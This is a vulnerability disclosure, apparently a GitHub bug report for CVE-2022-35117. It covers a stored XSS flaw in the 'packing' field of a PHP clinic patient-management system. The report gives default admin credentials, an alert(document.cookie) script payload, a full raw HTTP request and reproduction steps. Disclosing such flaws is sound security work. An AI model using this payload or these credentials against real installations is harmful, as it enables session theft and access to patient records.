Headline
CVE-2022-35117: bug_report/xss-1.md at main · zhangzhaoyuela/bug_report
Clinic’s Patient Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via update_medicine_details.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Packing text box under the Update Medical Details module.
Permalink
Cannot retrieve contributors at this time
Clinic’s Patient Management System v1.0 by oretnom23 has xss vulnerability
Author:hangZhaoYue
The password for the backend login account is: admin/admin123
Vulnerability details: There is a stored xss vulnerability in “update_medicine_details.php” of the Medicine Detaits module of the Medicines module in the background management system
vendors: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
Vulnerability File: pms/update_medicine_details.php
Vulnerability location: ip/pms/update_medicine_details.php?medicine_id=1&medicine_detail_id=1&packing=,packing
[+] Payload: ip/pms/update_medicine_details.php?medicine_id=1&medicine_detail_id=1&packing=<script>alert(/document.cookie/)</script> // Leak place —> packing
POST /pms/update_medicine_details.php?medicine_id=1&medicine_detail_id=1&packing=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1 Host: 192.168.1.19 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Referer: http://192.168.1.19/pms/update_medicine_details.php?medicine_id=1&medicine_detail_id=1&packing=%3Cscript%3Ealert(document.cookie)%3C/script%3E Cookie: _ga=GA1.1.1382961971.1655097107; PHPSESSID=0e9b9jpdjupmvl1dk6lq6dnmfe Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 92 hidden_id=1&medicine=1&packing=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=
After we log in to the background, click on Medicines, then click on Medicines Details
Pull to the bottom to see the editing function, click the edit on the first line
Fill in our payload in the packing box (<script>alert(document.cookie)</script>),Click update to save
4.After clicking save, you can see that our payload is executed, and the cookie pops up
5.And also execute our payload when we access the Medicine Detaits of the Medicines module